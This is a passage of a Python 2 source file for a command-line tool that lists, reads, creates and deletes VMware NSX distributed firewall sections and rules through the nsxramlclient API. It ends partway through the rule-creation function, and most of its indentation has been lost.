# Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
#
# "THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.”
import argparse
import ConfigParser
from argparse import RawTextHelpFormatter
from tabulate import tabulate
from nsxramlclient.client import NsxClient
from pkg_resources import resource_filename
from libutils import dfw_rule_list_helper
from libutils import connect_to_vc
from libutils import nametovalue
__author__ = 'Emanuele Mazza'
def dfw_section_list(client_session):
"""
This function returns all the sections of the NSX distributed firewall
:param client_session: An instance of an NsxClient Session
:return returns
        - for each of the three available section types (L2, L3Redirect, L3) a list with item 0 containing the
section name as string, item 1 containing the section id as string, item 2 containing the section type
as a string
- a dictionary containing all sections' details, including dfw rules
"""
all_dfw_sections = client_session.read('dfwConfig')['body']['firewallConfiguration']
if str(all_dfw_sections['layer2Sections']) != 'None':
l2_dfw_sections = all_dfw_sections['layer2Sections']['section']
else:
l2_dfw_sections = list()
    if str(all_dfw_sections['layer3RedirectSections']) != 'None':
l3r_dfw_sections = all_dfw_sections['layer3RedirectSections']['section']
else:
l3r_dfw_sections = list()
if str(all_dfw_sections['layer3Sections']) != 'None':
l3_dfw_sections = all_dfw_sections['layer3Sections']['section']
else:
l3_dfw_sections = list()
l2_section_list = [['---', '---', '---']]
l3r_section_list = [['---', '---', '---']]
l3_section_list = [['---', '---', '---']]
if type(l2_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l2_dfw_sections), dict.values(l2_dfw_sections))
l2_dfw_sections = list()
l2_dfw_sections.append(dict(keys_and_values))
if type(l3_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l3_dfw_sections), dict.values(l3_dfw_sections))
l3_dfw_sections = list()
l3_dfw_sections.append(dict(keys_and_values))
if type(l3r_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l3r_dfw_sections), dict.values(l3r_dfw_sections))
l3r_dfw_sections = list()
l3r_dfw_sections.append(dict(keys_and_values))
if len(l2_dfw_sections) != 0:
l2_section_list = list()
for sl in l2_dfw_sections:
try:
section_name = sl['@name']
except KeyError:
section_name = '<empty name>'
l2_section_list.append((section_name, sl['@id'], sl['@type']))
if len(l3r_dfw_sections) != 0:
l3r_section_list = list()
for sl in l3r_dfw_sections:
try:
section_name = sl['@name']
except KeyError:
section_name = '<empty name>'
l3r_section_list.append((section_name, sl['@id'], sl['@type']))
if len(l3_dfw_sections) != 0:
l3_section_list = list()
for sl in l3_dfw_sections:
try:
section_name = sl['@name']
except KeyError:
section_name = '<empty name>'
l3_section_list.append((section_name, sl['@id'], sl['@type']))
return l2_section_list, l3r_section_list, l3_section_list, all_dfw_sections
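# Usage sketch (assumes `session` is an authenticated NsxClient instance;
# the variable name is a placeholder introduced for this example):
#
#   l2_secs, l3r_secs, l3_secs, raw = dfw_section_list(session)
#   for name, section_id, section_type in l3_secs:
#       print name, section_id, section_type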
def _dfw_section_list_print(client_session, **kwargs):
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
if kwargs['verbose']:
print detailed_dfw_sections
else:
print tabulate(l2_section_list, headers=["Name", "ID", "Type"], tablefmt="psql")
print tabulate(l3r_section_list, headers=["Name", "ID", "Type"], tablefmt="psql")
print tabulate(l3_section_list, headers=["Name", "ID", "Type"], tablefmt="psql")
def dfw_section_delete(client_session, section_id):
"""
    This function deletes a section given its id
:param client_session: An instance of an NsxClient Session
:param section_id: The id of the section that must be deleted
:return returns
- A table containing these information: Return Code (True/False), Section ID, Section Name, Section Type
- ( verbose option ) A list containing a single list which elements are Return Code (True/False),
Section ID, Section Name, Section Type
        If there is no matching section
- Return Code is set to False
- Section ID is set to the value passed as input parameter
- Section Name is set to "---"
- Section Type is set to "---"
"""
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
dfw_section_id = str(section_id)
for i, val in enumerate(l3_section_list):
if dfw_section_id == str(val[1]) and str(val[0]) != 'Default Section Layer3':
client_session.delete('dfwL3SectionId', uri_parameters={'sectionId': dfw_section_id})
result = [["True", dfw_section_id, str(val[0]), str(val[-1])]]
return result
if dfw_section_id == str(val[1]) and str(val[0]) == 'Default Section Layer3':
result = [["False-Delete Default Section is not allowed", dfw_section_id, "---", "---"]]
return result
for i, val in enumerate(l2_section_list):
if dfw_section_id == str(val[1]) and str(val[0]) != 'Default Section Layer2':
client_session.delete('dfwL2SectionId', uri_parameters={'sectionId': dfw_section_id})
result = [["True", dfw_section_id, str(val[0]), str(val[-1])]]
return result
if dfw_section_id == str(val[1]) and str(val[0]) == 'Default Section Layer2':
result = [["False-Delete Default Section is not allowed", dfw_section_id, "---", "---"]]
return result
for i, val in enumerate(l3r_section_list):
if dfw_section_id == str(val[1]) and str(val[0]) != 'Default Section':
client_session.delete('section', uri_parameters={'section': dfw_section_id})
result = [["True", dfw_section_id, str(val[0]), str(val[-1])]]
return result
if dfw_section_id == str(val[1]) and str(val[0]) == 'Default Section':
result = [["False-Delete Default Section is not allowed", dfw_section_id, "---", "---"]]
return result
result = [["False", dfw_section_id, "---", "---"]]
return result
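# Usage sketch (section id 1234 is a made-up value; `session` as above):
#
#   result = dfw_section_delete(session, 1234)
#   # result[0][0] is 'True' on success, or an error string such as
#   # 'False-Delete Default Section is not allowed'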
def _dfw_section_delete_print(client_session, **kwargs):
if not (kwargs['dfw_section_id']):
print ('Mandatory parameters missing: [-sid SECTION ID]')
return None
section_id = kwargs['dfw_section_id']
result = dfw_section_delete(client_session, section_id)
if kwargs['verbose']:
print result
else:
print tabulate(result, headers=["Return Code", "Section ID", "Section Name", "Section Type"], tablefmt="psql")
def dfw_rule_delete(client_session, rule_id):
"""
    This function deletes a dfw rule given its id
:param client_session: An instance of an NsxClient Session
:param rule_id: The id of the rule that must be deleted
:return returns
        - A table containing the following information: Return Code (True/False), Rule ID, Rule Name, Applied-To, Section ID
- ( verbose option ) A list containing a single list which elements are Return Code (True/False),
Rule ID, Rule Name, Applied-To, Section ID
If there is no matching rule
- Return Code is set to False
- Rule ID is set to the value passed as input parameter
- All other returned parameters are set to "---"
"""
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
dfw_rule_id = str(rule_id)
for i, val in enumerate(l3_rule_list):
if dfw_rule_id == str(val[0]) and str(val[1]) != 'Default Rule':
dfw_section_id = str(val[-1])
section_list, dfwL3_section_details = dfw_section_read(client_session, dfw_section_id)
etag = str(section_list[0][3])
client_session.delete('dfwL3Rule', uri_parameters={'ruleId': dfw_rule_id, 'sectionId': dfw_section_id},
additional_headers={'If-match': etag})
result = [["True", dfw_rule_id, str(val[1]), str(val[-2]), str(val[-1])]]
return result
        if dfw_rule_id == str(val[0]) and str(val[1]) == 'Default Rule':
result = [["False-Delete Default Rule is not allowed", dfw_rule_id, "---", "---", "---"]]
return result
for i, val in enumerate(l2_rule_list):
if dfw_rule_id == str(val[0]) and str(val[1]) != 'Default Rule':
dfw_section_id = str(val[-1])
section_list, dfwL2_section_details = dfw_section_read(client_session, dfw_section_id)
etag = str(section_list[0][3])
client_session.delete('dfwL2Rule', uri_parameters={'ruleId': dfw_rule_id, 'sectionId': dfw_section_id},
additional_headers={'If-match': etag})
result = [["True", dfw_rule_id, str(val[1]), str(val[-2]), str(val[-1])]]
return result
        if dfw_rule_id == str(val[0]) and str(val[1]) == 'Default Rule':
result = [["False-Delete Default Rule is not allowed", dfw_rule_id, "---", "---", "---"]]
return result
for i, val in enumerate(l3r_rule_list):
if dfw_rule_id == str(val[0]) and str(val[1]) != 'Default Rule':
dfw_section_id = str(val[-1])
section_list, dfwL3r_section_details = dfw_section_read(client_session, dfw_section_id)
etag = str(section_list[0][3])
client_session.delete('rule', uri_parameters={'ruleID': dfw_rule_id, 'section': dfw_section_id})
result = [["True", dfw_rule_id, str(val[1]), str(val[-2]), str(val[-1])]]
return result
        if dfw_rule_id == str(val[0]) and str(val[1]) == 'Default Rule':
result = [["False-Delete Default Rule is not allowed", dfw_rule_id, "---", "---", "---"]]
return result
result = [["False", dfw_rule_id, "---", "---", "---"]]
return result
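# Usage sketch (rule id 1013 is a placeholder):
#
#   result = dfw_rule_delete(session, 1013)
#   print tabulate(result, headers=["Return Code", "Rule ID", "Rule Name",
#                                   "Applied-To", "Section ID"], tablefmt="psql")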
def _dfw_rule_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
rule_id = kwargs['dfw_rule_id']
result = dfw_rule_delete(client_session, rule_id)
if kwargs['verbose']:
print result
else:
print tabulate(result, headers=["Return Code", "Rule ID", "Rule Name", "Applied-To", "Section ID"],
tablefmt="psql")
def dfw_section_id_read(client_session, dfw_section_name):
"""
This function returns the section(s) ID(s) given a section name
:param client_session: An instance of an NsxClient Session
:param dfw_section_name: The name ( case sensitive ) of the section for which the ID is wanted
:return returns
        - A list of dictionaries. Each dictionary contains the type and the id of each section named as
          specified by the input parameter. If no such section exists, the list contains a single dictionary with
{'Type': 0, 'Id': 0}
"""
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
dfw_section_id = list()
dfw_section_name = str(dfw_section_name)
for i, val in enumerate(l3_section_list):
if str(val[0]) == dfw_section_name:
dfw_section_id.append({'Type': str(val[2]), 'Id': int(val[1])})
for i, val in enumerate(l3r_section_list):
if str(val[0]) == dfw_section_name:
dfw_section_id.append({'Type': str(val[2]), 'Id': int(val[1])})
for i, val in enumerate(l2_section_list):
if str(val[0]) == dfw_section_name:
dfw_section_id.append({'Type': str(val[2]), 'Id': int(val[1])})
if len(dfw_section_id) == 0:
dfw_section_id.append({'Type': 0, 'Id': 0})
return dfw_section_id
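# Usage sketch (the section name is a placeholder):
#
#   ids = dfw_section_id_read(session, 'WEB-SECTION')
#   # e.g. [{'Type': 'LAYER3', 'Id': 1007}], or [{'Type': 0, 'Id': 0}]
#   # when no section carries that name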
def _dfw_section_id_read_print(client_session, **kwargs):
if not (kwargs['dfw_section_name']):
print ('Mandatory parameters missing: [-sname SECTION NAME]')
return None
dfw_section_name = str(kwargs['dfw_section_name'])
dfw_section_id = dfw_section_id_read(client_session, dfw_section_name)
if kwargs['verbose']:
print dfw_section_id
else:
dfw_section_id_csv = ",".join([str(section['Id']) for section in dfw_section_id])
print dfw_section_id_csv
def dfw_rule_id_read(client_session, dfw_section_id, dfw_rule_name):
"""
This function returns the rule(s) ID(s) given a section id and a rule name
:param client_session: An instance of an NsxClient Session
    :param dfw_rule_name: The name ( case sensitive ) of the rule for which the ID is/are wanted. If the name
                          includes spaces, enclose it between ""
:param dfw_section_id: The id of the section where the rule must be searched
:return returns
- A dictionary with the rule name as the key and a list as a value. The list contains all the matching
          rules id(s). For example {'RULE_ONE': [1013, 1012]}. If no matching rule exists, an empty dictionary is
returned
"""
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
list_names = list()
list_ids = list()
dfw_rule_name = str(dfw_rule_name)
dfw_section_id = str(dfw_section_id)
for i, val in enumerate(l2_rule_list):
if (dfw_rule_name == val[1]) and (dfw_section_id == val[-1]):
list_names.append(dfw_rule_name)
list_ids.append(int(val[0]))
for i, val in enumerate(l3_rule_list):
if (dfw_rule_name == val[1]) and (dfw_section_id == val[-1]):
list_names.append(dfw_rule_name)
list_ids.append(int(val[0]))
for i, val in enumerate(l3r_rule_list):
if (dfw_rule_name == val[1]) and (dfw_section_id == val[-1]):
list_names.append(dfw_rule_name)
list_ids.append(int(val[0]))
dfw_rule_id = dict.fromkeys(list_names, list_ids)
return dfw_rule_id
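# Usage sketch (section id and rule name are placeholders):
#
#   rule_ids = dfw_rule_id_read(session, 1007, 'RULE_ONE')
#   # e.g. {'RULE_ONE': [1013, 1012]} when two rules share the name,
#   # or {} when nothing matches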
def _dfw_rule_id_read_print(client_session, **kwargs):
if not (kwargs['dfw_rule_name']):
print ('Mandatory parameters missing: [-rname RULE NAME (use "" if name includes spaces)]')
return None
if not (kwargs['dfw_section_id']):
print ('Mandatory parameters missing: [-sid SECTION ID]')
return None
dfw_section_id = str(kwargs['dfw_section_id'])
dfw_rule_name = str(kwargs['dfw_rule_name'])
dfw_rule_id = dfw_rule_id_read(client_session, dfw_section_id, dfw_rule_name)
if kwargs['verbose']:
print dfw_rule_id
else:
try:
dfw_rule_ids_str = [str(ruleid) for ruleid in dfw_rule_id[dfw_rule_name]]
dfw_rule_id_csv = ",".join(dfw_rule_ids_str)
print tabulate([(dfw_rule_name, dfw_rule_id_csv)], headers=["Rule Name", "Rule IDs"], tablefmt="psql")
except KeyError:
print 'Rule name {} not found in section Id {}'.format(kwargs['dfw_rule_name'], kwargs['dfw_section_id'])
def dfw_rule_list(client_session):
"""
This function returns all the rules of the NSX distributed firewall
:param client_session: An instance of an NsxClient Session
:return returns
- a tabular view of all the dfw rules defined across L2, L3, L3Redirect
- ( verbose option ) a list containing as many list as the number of dfw rules defined across
L2, L3, L3Redirect (in this order). For each rule, these fields are returned:
"ID", "Name", "Source", "Destination", "Service", "Action", "Direction", "Packet Type", "Applied-To",
"ID (Section)"
"""
all_dfw_sections_response = client_session.read('dfwConfig')
all_dfw_sections = client_session.normalize_list_return(all_dfw_sections_response['body']['firewallConfiguration'])
if str(all_dfw_sections[0]['layer3Sections']) != 'None':
l3_dfw_sections = all_dfw_sections[0]['layer3Sections']['section']
else:
l3_dfw_sections = list()
if str(all_dfw_sections[0]['layer2Sections']) != 'None':
l2_dfw_sections = all_dfw_sections[0]['layer2Sections']['section']
else:
l2_dfw_sections = list()
if str(all_dfw_sections[0]['layer3RedirectSections']) != 'None':
l3r_dfw_sections = all_dfw_sections[0]['layer3RedirectSections']['section']
else:
l3r_dfw_sections = list()
if type(l2_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l2_dfw_sections), dict.values(l2_dfw_sections))
l2_dfw_sections = list()
l2_dfw_sections.append(dict(keys_and_values))
if type(l3_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l3_dfw_sections), dict.values(l3_dfw_sections))
l3_dfw_sections = list()
l3_dfw_sections.append(dict(keys_and_values))
if type(l3r_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l3r_dfw_sections), dict.values(l3r_dfw_sections))
l3r_dfw_sections = list()
l3r_dfw_sections.append(dict(keys_and_values))
l2_temp = list()
l2_rule_list = list()
if len(l2_dfw_sections) != 0:
for i, val in enumerate(l2_dfw_sections):
if 'rule' in val:
l2_temp.append(l2_dfw_sections[i])
l2_dfw_sections = l2_temp
if len(l2_dfw_sections) > 0:
if 'rule' in l2_dfw_sections[0]:
rule_list = list()
for sptr in l2_dfw_sections:
section_rules = client_session.normalize_list_return(sptr['rule'])
l2_rule_list = dfw_rule_list_helper(client_session, section_rules, rule_list)
else:
l2_rule_list = []
l3_temp = list()
l3_rule_list = list()
if len(l3_dfw_sections) != 0:
for i, val in enumerate(l3_dfw_sections):
if 'rule' in val:
l3_temp.append(l3_dfw_sections[i])
l3_dfw_sections = l3_temp
if len(l3_dfw_sections) > 0:
if 'rule' in l3_dfw_sections[0]:
rule_list = list()
for sptr in l3_dfw_sections:
section_rules = client_session.normalize_list_return(sptr['rule'])
l3_rule_list = dfw_rule_list_helper(client_session, section_rules, rule_list)
else:
l3_rule_list = []
l3r_temp = list()
l3r_rule_list = list()
if len(l3r_dfw_sections) != 0:
for i, val in enumerate(l3r_dfw_sections):
if 'rule' in val:
l3r_temp.append(l3r_dfw_sections[i])
l3r_dfw_sections = l3r_temp
if len(l3r_dfw_sections) > 0:
if 'rule' in l3r_dfw_sections[0]:
rule_list = list()
for sptr in l3r_dfw_sections:
section_rules = client_session.normalize_list_return(sptr['rule'])
l3r_rule_list = dfw_rule_list_helper(client_session, section_rules, rule_list)
else:
l3r_rule_list = []
return l2_rule_list, l3_rule_list, l3r_rule_list
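# Usage sketch: the three returned lists share one column layout, so each
# can be fed straight into tabulate (assumes `session` as above):
#
#   l2_rules, l3_rules, l3r_rules = dfw_rule_list(session)
#   print tabulate(l3_rules, headers=["ID", "Name", "Source", "Destination",
#                                     "Service", "Action", "Direction",
#                                     "Packet Type", "Applied-To",
#                                     "ID (Section)"], tablefmt="psql")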
def _dfw_rule_list_print(client_session, **kwargs):
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
if kwargs['verbose']:
print l2_rule_list, l3_rule_list, l3r_rule_list
else:
print ''
print '*** ETHERNET RULES ***'
print tabulate(l2_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
print ''
print '*** LAYER 3 RULES ***'
print tabulate(l3_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
        print ''
print '*** REDIRECT RULES ***'
print tabulate(l3r_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_read(client_session, rule_id):
"""
This function retrieves details of a dfw rule given its id
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:return: returns
- tabular view of the dfw rule
- ( verbose option ) a list containing the dfw rule information: ID(Rule)- Name(Rule)- Source- Destination-
          Services- Action- Direction- Pkttype- AppliedTo- ID(section)
"""
rule_list = dfw_rule_list(client_session)
rule = list()
for sectionptr in rule_list:
for ruleptr in sectionptr:
if ruleptr[0] == str(rule_id):
rule.append(ruleptr)
return rule
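# Usage sketch (rule id is a placeholder; an empty list means no rule with
# that id exists in any section):
#
#   rule = dfw_rule_read(session, 1013)
#   if rule:
#       print rule[0][1]  # the rule name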
def _dfw_rule_read_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
rule_id = kwargs['dfw_rule_id']
rule = dfw_rule_read(client_session, rule_id)
if kwargs['verbose']:
print rule
else:
print tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_source_delete(client_session, rule_id, source):
"""
    This function deletes one of the sources of a dfw rule given the rule id and the source to be deleted
If two or more sources have the same name, the function will delete all of them
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:param source: The source of the dfw rule to be deleted. If the source name contains any space, then it must be
enclosed in double quotes (like "VM Network")
:return: returns
- tabular view of the dfw rule after the deletion process has been performed
        - ( verbose option ) a list containing a list with the following dfw rule information after the deletion
          process has been performed: ID(Rule)- Name(Rule)- Source- Destination- Services- Action- Direction-
          Pkttype- AppliedTo- ID(section)
"""
source = str(source)
rule = dfw_rule_read(client_session, rule_id)
if len(rule) == 0:
# It means a rule with id = rule_id does not exist
result = [[rule_id, "---", source, "---", "---", "---", "---", "---", "---", "---"]]
return result
# Get the rule data structure that will be modified and then piped into the update function
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
section_id = rule[0][-1]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
print 'ERROR: RULE TYPE SELECTOR CANNOT BE EMPTY - ABORT !'
return
if rule_type_selector == 'LAYER2':
rule_type = 'dfwL2Rule'
elif rule_type_selector == 'LAYER3':
rule_type = 'dfwL3Rule'
else:
rule_type = 'rule'
rule_schema = client_session.read(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id})
rule_etag = rule_schema.items()[-1][1]
if 'sources' not in rule_schema.items()[1][1]['rule']:
# It means the only source is "any" and it cannot be deleted short of deleting the whole rule
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['sources']['source']) == list:
        # It means there is more than one source, each one with its own dict
sources_list = rule_schema.items()[1][1]['rule']['sources']['source']
for i, val in enumerate(sources_list):
if val['type'] == 'Ipv4Address' and val['value'] == source or 'name' in val and val['name'] == source:
del rule_schema.items()[1][1]['rule']['sources']['source'][i]
        # The ordered dict "rule_schema" must be parsed to find the dict that will be piped into the update function
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['sources']['source']) == dict:
        # It means there is just one explicit source with its own dict
source_dict = rule_schema.items()[1][1]['rule']['sources']['source']
if source_dict['type'] == 'Ipv4Address' and source_dict['value'] == source or \
'name' in dict.keys(source_dict) and source_dict['name'] == source:
del rule_schema.items()[1][1]['rule']['sources']
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
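# Usage sketch (all values are placeholders): a source can be removed
# either by IP value or by object name, matching the lookup logic above.
#
#   dfw_rule_source_delete(session, 1013, '10.0.0.1')   # Ipv4Address source
#   dfw_rule_source_delete(session, 1013, 'web-vm-01')  # named object source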
def _dfw_rule_source_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
if not (kwargs['dfw_rule_source']):
print ('Mandatory parameters missing: [-src RULE SOURCE]')
return None
rule_id = kwargs['dfw_rule_id']
source = kwargs['dfw_rule_source']
rule = dfw_rule_source_delete(client_session, rule_id, source)
if kwargs['verbose']:
print rule
else:
print tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_destination_delete(client_session, rule_id, destination):
"""
    This function deletes one of the destinations of a dfw rule given the rule id and the destination to be deleted.
If two or more destinations have the same name, the function will delete all of them
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:param destination: The destination of the dfw rule to be deleted. If the destination name contains any space, then
it must be enclosed in double quotes (like "VM Network")
:return: returns
- tabular view of the dfw rule after the deletion process has been performed
        - ( verbose option ) a list containing a list with the following dfw rule information after the deletion
          process has been performed: ID(Rule)- Name(Rule)- Source- Destination- Services- Action- Direction-
          Pkttype- AppliedTo- ID(section)
"""
destination = str(destination)
rule = dfw_rule_read(client_session, rule_id)
if len(rule) == 0:
# It means a rule with id = rule_id does not exist
result = [[rule_id, "---", "---", destination, "---", "---", "---", "---", "---", "---"]]
return result
# Get the rule data structure that will be modified and then piped into the update function
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
section_id = rule[0][-1]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
print 'ERROR: RULE TYPE SELECTOR CANNOT BE EMPTY - ABORT !'
return
if rule_type_selector == 'LAYER2':
rule_type = 'dfwL2Rule'
elif rule_type_selector == 'LAYER3':
rule_type = 'dfwL3Rule'
else:
rule_type = 'rule'
rule_schema = client_session.read(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id})
rule_etag = rule_schema.items()[-1][1]
if 'destinations' not in rule_schema.items()[1][1]['rule']:
# It means the only destination is "any" and it cannot be deleted short of deleting the whole rule
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['destinations']['destination']) == list:
        # It means there is more than one destination, each one with its own dict
destination_list = rule_schema.items()[1][1]['rule']['destinations']['destination']
for i, val in enumerate(destination_list):
if val['type'] == 'Ipv4Address' and val['value'] == destination or \
'name' in val and val['name'] == destination:
del rule_schema.items()[1][1]['rule']['destinations']['destination'][i]
        # The ordered dict "rule_schema" must be parsed to find the dict that will be piped into the update function
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['destinations']['destination']) == dict:
        # It means there is just one explicit destination with its own dict
destination_dict = rule_schema.items()[1][1]['rule']['destinations']['destination']
if destination_dict['type'] == 'Ipv4Address' and destination_dict['value'] == destination or \
'name' in dict.keys(destination_dict) and \
destination_dict['name'] == destination:
del rule_schema.items()[1][1]['rule']['destinations']
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
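# Usage sketch (mirrors dfw_rule_source_delete; values are placeholders):
#
#   dfw_rule_destination_delete(session, 1013, '10.0.0.2')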
def _dfw_rule_destination_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
if not (kwargs['dfw_rule_destination']):
print ('Mandatory parameters missing: [-dst RULE DESTINATION]')
return None
rule_id = kwargs['dfw_rule_id']
destination = kwargs['dfw_rule_destination']
rule = dfw_rule_destination_delete(client_session, rule_id, destination)
if kwargs['verbose']:
print rule
else:
print tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_create(client_session, section_id, rule_name, rule_source_value, rule_destination_value, rule_direction,
rule_pktype, rule_applyto, rule_disabled='false', rule_action='allow',
rule_source_type='Ipv4Address', rule_destination_type='Ipv4Address', rule_source_excluded='false',
rule_destination_excluded='false', rule_logged='false', rule_source_name=None,
rule_destination_name=None, rule_service_protocolname=None, rule_service_destport=None,
rule_service_srcport=None, rule_service_name=None, rule_note=None, rule_tag=None, vccontent=None):
if rule_applyto == 'any':
rule_applyto = 'ANY'
elif rule_applyto == 'dfw':
rule_applyto = 'DISTRIBUTED_FIREWALL'
elif rule_applyto == 'edgegw':
rule_applyto = 'ALL_EDGES'
if not rule_source_name:
rule_source_name = ''
if not rule_destination_name:
rule_destination_name = ''
if not rule_service_protocolname:
rule_service_protocolname = ''
if not rule_service_destport:
rule_service_destport = ''
if not rule_service_srcport:
rule_service_srcport = ''
if not rule_service_name:
rule_service_name = ''
if not rule_note:
rule_note = ''
if not rule_tag:
rule_tag = ''
if not vccontent:
vccontent = ''
# TODO: complete the description
API_TYPES = {'dc': 'Datacenter', 'ipset': 'IPSet', 'macset': 'MACSet', 'ls': 'VirtualWire',
'secgroup': 'SecurityGroup', 'host': 'HostSystem', 'vm':'VirtualMachine',
'cluster': 'ClusterComputeResource', 'dportgroup': 'DistributedVirtualPortgroup',
'portgroup': 'Network', 'respool': 'ResourcePool', 'vapp': 'ResourcePool', 'vnic': 'VirtualMachine',
'Ipv4Address': 'Ipv4Address'}
# Verify that in the target section a rule with the same name does not exist
# Find the rule type from the target section
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
        print 'Error: cannot find a section matching the section-id specified. Aborting. No action has been ' \
              'performed on the system'
return
if rule_type_selector == 'LAYER2' or rule_type_selector == 'LAYER3':
if rule_type_selector == 'LAYER2':
for val in l2_rule_list:
if val[1] == rule_name:
                    print 'Error: a rule with the same name already exists. Aborting. No action has been performed' \
                          ' on the system'
return
rule_type = 'dfwL2Rules'
section_type = 'dfwL2SectionId'
if rule_pktype != 'any':
print ('For a L2 rule "any" is the only allowed value for parameter -pktype')
return None
if rule_action != 'allow' and rule_action != 'block':
print ('For a L2 rule "allow/block" are the only allowed value for parameter -action')
return None
# For L2 rules where the GUI shows "block" the python data structure for the API call needs "deny"
# At the cli level this must be hidden to avoid confusing the user with too many options for the same action
if rule_action == 'block':
rule_action = 'deny'
if rule_applyto == 'ANY' or rule_applyto == 'ALL_EDGES':
print ('For a L2 rule "any" and "edgegw" are not allowed values for parameter -appto')
return None
if rule_source_type == 'IPSet' or rule_destination_type == 'IPSet':
print ('For a L2 rule "IPSET" is not an allowed value neither as source nor as destination')
return None
if rule_type_selector == 'LAYER3':
# For L3 rules where the GUI shows "block" the python data structure for the API call needs "deny"
# At the cli level this must be hidden to avoid confusing the user with too many options for the same action
if rule_action == 'block':
rule_action = 'deny'
for val in l3_rule_list:
if val[1] == rule_name:
                    print 'Error: a rule with the same name already exists. Aborting. No action has been performed' \
                          ' on the system'
return
rule_type = 'dfwL3Rules'
section_type = 'dfwL3SectionId'
        # The schema for L2 rules is the same as for L3 rules
rule_schema = client_session.extract_resource_body_example('dfwL3Rules', 'create')
else:
for val in l3r_rule_list:
if val[1] == rule_name:
                print 'Error: a rule with the same name already exists. Aborting. No action has been performed' \
                      ' on the system'
return
rule_type = 'rules'
section_type = 'section'
rule_schema = client_session.extract_resource_body_example(rule_type, 'create')
        print 'Error: L3 redirect rules are not supported in this version. Aborting. No action has been performed' \
              ' on the system'
return
section = client_session.read(section_type, uri_parameters={'sectionId': section_id})
section_etag = section.items()[-1][1]
if rule_type != 'rules':
# L3 or L2 rule
# Mandatory values of a rule
